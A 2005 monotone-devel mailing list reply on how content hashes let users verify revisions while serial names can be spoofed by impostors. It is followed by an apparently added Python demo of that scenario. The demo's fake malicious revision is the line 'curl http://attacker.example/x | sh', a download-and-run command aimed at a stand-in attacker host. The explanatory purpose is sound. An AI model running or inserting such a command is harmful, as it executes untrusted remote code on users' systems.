monotone-devel
From: Nathaniel Smith
Subject: Trust in monotone (was Re: [Monotone-devel] newbie question - SHA1 vs serials)
Date: Tue, 19 Apr 2005 11:19:03 -0700
User-agent: Mutt/1.5.8i

On Tue, Apr 19, 2005 at 09:50:57AM -0700, K. Richard Pixley wrote:
> In other messages, I've agreed that some form of repository 
> authentication would solve the problem.  Long term, I think this sort of 
> feature would be very useful in monotone, even aside from the issue of 
> man-in-the-middle and imposter attacks.
> 
> As I read the manual, (the sum of my monotone experience), monotone is 
> currently vulnerable to these problems already.  And finding a means of 
> addressing it would seem to be a welcome addition in any case.

We do have "repository authentication" at netsync time -- mostly as a
way to prevent public monotone servers from being turned into warez
distribution networks, etc.

For more protection, we prefer to define trust at the edges; there's
at least a somewhat thought-out design for how to do this more
systematically (the current get_revision_cert_trust hook is very much a
stopgap measure).  Anyone interested can see some discussion:
  http://frances.vorpus.org/~njs/mt-permission.log

Trust is also a rather serious problem with serials.  The case where I
have foo.bar.com and someone sends me 1:foo.bar.com isn't so bad; the
bad case is where I have foo.bar.com and someone else sends _you_
1:foo.bar.com, you have no way to tell whether it's valid or not, and
now when I tell you "hey, can you check out this bug I'm working on
in 1:foo.bar.com?", you may unknowingly check out and run the evil
person's code instead.  Hashes, you _always_ can communicate reliably.

-- Nathaniel

-- 
.i dei jitfa fanmo xatra

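The point of the last paragraph, that a content hash is self-certifying while a serial is only a claim, is easy to show in code. The following is an added example and not monotone's own code; the peer model, the key names ("alice-key", "mallory-key"), the revision contents and the branch name are all constructed for illustration, and the `cert_trust` method is a hypothetical simplification of the "trust at the edges" idea, not the real signature or semantics of monotone's `get_revision_cert_trust` hook.

```python
"""Self-certifying hash ids vs. unverifiable serial ids (constructed demo)."""
from __future__ import annotations

import hashlib


def revision_id(content: bytes) -> str:
    """Content-addressed id: the SHA1 of the revision data, as monotone uses."""
    return hashlib.sha1(content).hexdigest()


class Peer:
    """A node that stores revisions under both naming schemes (hypothetical model)."""

    def __init__(self, name: str, trusted: dict[str, set[str]] | None = None):
        self.name = name
        self.by_hash: dict[str, bytes] = {}
        self.by_serial: dict[str, bytes] = {}
        # branch -> keys whose branch certs this peer trusts (assumed policy shape)
        self.trusted = trusted or {}

    def receive_by_hash(self, claimed_id: str, content: bytes) -> bool:
        """Accept only if the data actually hashes to the claimed id.

        The check is purely local: no server or third party is consulted.
        """
        if revision_id(content) != claimed_id:
            return False  # tampered or impostor data: rejected on arrival
        self.by_hash[claimed_id] = content
        return True

    def receive_by_serial(self, serial: str, content: bytes) -> bool:
        """A serial carries no proof of anything: whoever claims it first wins."""
        if serial in self.by_serial:
            return False  # a second claim merely conflicts; neither is verifiable
        self.by_serial[serial] = content
        return True

    def cert_trust(self, signers: set[str], branch: str) -> bool:
        """Trust decided at the edge: a branch cert counts only if a trusted key signed it.

        Hypothetical simplification of a cert-trust policy, not monotone's hook.
        """
        return bool(signers & self.trusted.get(branch, set()))


def demo() -> dict:
    """Replay the scenario from the message with constructed data."""
    good = b"fix: add bounds check in parser\n"          # constructed revision
    evil = b"curl http://attacker.example/x | sh\n"      # constructed impostor revision
    h = revision_id(good)

    alice = Peer("alice")
    bob = Peer("bob", trusted={"foo.bar.com": {"alice-key"}})
    alice.receive_by_hash(h, good)
    alice.receive_by_serial("1:foo.bar.com", good)

    # An impostor pushes the evil revision to Bob under both kinds of name.
    hash_attack_accepted = bob.receive_by_hash(h, evil)               # False
    serial_attack_accepted = bob.receive_by_serial("1:foo.bar.com", evil)  # True

    # Alice later says "check out 1:foo.bar.com" (or "check out <h>").
    serial_checkout = bob.by_serial["1:foo.bar.com"]   # the impostor's code
    bob.receive_by_hash(h, good)                       # genuine data verifies fine
    hash_checkout = bob.by_hash[h]                     # Alice's code

    return {
        "hash_attack_accepted": hash_attack_accepted,
        "serial_attack_accepted": serial_attack_accepted,
        "serial_checkout_is_evil": serial_checkout == evil,
        "hash_checkout_is_good": hash_checkout == good,
        "trust_alice": bob.cert_trust({"alice-key"}, "foo.bar.com"),
        "trust_mallory": bob.cert_trust({"mallory-key"}, "foo.bar.com"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The hash path fails closed without any shared state between Alice and Bob, which is why a hash can "always be communicated reliably"; the serial path has nothing to check, so the first party to claim the name wins and the recipient cannot tell. Any authentication of serials would have to come from an external trust decision such as the `cert_trust` stub, which is the edge-based design the message refers to.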